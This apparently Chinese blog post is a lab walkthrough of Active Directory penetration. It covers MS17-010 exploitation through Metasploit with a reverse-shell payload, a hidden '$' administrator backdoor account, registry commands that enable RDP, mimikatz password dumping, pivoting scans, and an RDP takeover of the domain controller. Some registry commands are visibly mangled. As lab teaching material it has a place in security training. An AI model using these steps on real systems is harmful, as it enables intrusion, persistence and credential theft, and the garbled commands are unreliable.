- 12021-03-30_prepared select statement和select statement
- 2开课吧python小课学了有用吗-考研人注意了,停下手头的活,再忙也要看一下这个!...
- 3LM(Levenberg-Marquardt) & PCG(预条件共轭梯度法)
- 4IKE学习笔记2(IKE交换第一阶段)_ike第一阶段交换模式
- 5python+appium自动化测试-输出日志到控制台&文件_怎么把appium server的日志放到python控制台
- 6centos7部署zookeeper集群_zk2888和3888端口
- 7MySQL的SSL加密连接与性能开销_mariadb ssl加密对性能的影响
- 8如何看待培训机构出来的非科班程序员_非科班程序员要不要去实习
- 9【Element入门】5、Element UI 导航组件详解_elm组件
- 10python批量检索文献_Python 批量爬取Web of Science 文献信息数据
域渗透详解
赞
踩
一、域环境搭建
1、子域主机:Windows7(192.168.162.134),加入域yst;
2、域控制器:Windows2008(192.168.162.150)
3、攻击主机:kali(192.168.162.131)
二、域渗透
1、信息收集:扫描获取目标网段所有主机的IP、系统版本、开放端口等信息;
(1)、ip扫描
获取到子域主机IP:192.168.162.134
(2)、详细扫描
目标主机开放445端口,而且系统版本是win7或者2008,主机属于YST域;
二、子域主机的渗透
该主机445端口开放,版本为win7或者2008,符合永恒之蓝漏洞(ms 17-010),所以进行尝试验证:
永恒之蓝漏洞:永恒之蓝漏洞讲解
1、msf下搜索ms 17-010
2、使用auxiliary/scanner/smb/smb_ms17_010进行判断
配置目标主机,run,检测显示目标主机大概率存在ms17-010
3、接下来使用模块进行漏洞利用
使用攻击模块,这次为了进行域渗透,dump密码,所以我们要拿到更高权限的shell,因此我们要配置payload
配置完payload后,show options
我们需要配置rhost(目标主机IP)和lhost(本机IP)
配置完成后,再次show options查看:
进行攻击:exploit
反弹shell,进行权限查看:
成功拿到子域主机的system权限;
三、域内成员密码dump
1、通过子域主机查看域信息
域名为:yst.com
2、在拿下的子域主机上留后门
(1)、新建用户
用户名后带$符,便于隐藏,用户在输入net user命令时,不显示;
(2)、net localgroup administrators rxx$ /add #将用户rxx$加入管理员组
(3)、开启3389端口
- 1、REG ADD HKLMYSYSTEMYCurrentControlSet\Control Terminal" "Server /v fDenyTSConnections /t REG DWORD /d 00000000 /f #开启3389端口
-
- 2、REG ADD HKLMYSYSTEMYCurrentControlSet\Control Terminal" "Server /v fDenyTSConnections /t REG DWORD /d 11111111 /f #关闭3389端口
(3)、远程登陆
rdesktop 192.168.162.134:3389 #linux下远程桌面连接命令
后门成功;
3、获取用户和密码
退出shell,加载猕猴桃(mimikatz),使用keberos模块获取明文密码
四、内网域控渗透
1、内网主机发现,获取域控IP
- 总结的方法如下:
- 1、在meterpreter下:
- (1)、run post/windows/gather/arp_scanner rhosts=192.168.162.0/24 #基于arp协议
- (2)、run post/multi/gather/ping_sweep rhosts=192.168.162.0/24 #基于ping命令
- (3)、meterpreter >info post/multi/gather/ping_sweep
- 2、进入shell,在cmd下:
- ipconfig /all #查看用户IP信息,主要观察DNS服务器IP
- route print #查看路由表
-
-
- 两种方法对照着来,判断内网域控主机的IP地址
通过DNS判断内网域控IP:192.168.162.150
2、端口信息扫描
- 1、shell下:
- C:\Windows\system32>exit #退出shell,返回到meterpreter
-
- 2、meterpreter下:
- meterpreter >backgroud #返回到msf
-
- 3、msf下:
- route add 192.168.162.134 255.255.255.0 1 #给msf添加路由,方便nmap进行内网扫描
-
- 路由添加成功后接下来进行内网扫描,方法如下:
- auxiliary/scanner/discovery/udp_sweep #基于udp协议发现内网存活主机
- auxiliary/scanner/discovery/udp_probe #基于udp协议发现内网存活主机
- auxiliary/scanner/netbios/nbname #基于netbios协议发现内网存活主机
- auxiliary/scanner/portscan/tcp #基于tcp进行端口扫描
-
- 4、选择要使用的模块:
- (1)、use auxiliary/scanner/discovery/udp_sweep
- set rhosts 192.168.162.150
- (2)、use auxiliary/scanner/discovery/udp_probe
- set rhosts 192.168.162.150
- (3)、use auxiliary/scanner/netbios/nbname
- set rhosts 192.168.162.150
- (4)、use auxiliary/scanner/portscan/tcp
- set rhosts 192.168.162.150
扫描结果如下:
3、漏洞利用
域控主机445,3389端口开放,也可能存在ms17-010漏洞,但我们已经拿下了子域主机和域控管理员账号,所以直接利用3389进行远程连接;
(1)、kali连接域控:rdesktop 192.168.162.150:3389
(2)、通过猕猴桃查到的密码进行登录
域渗透完成。
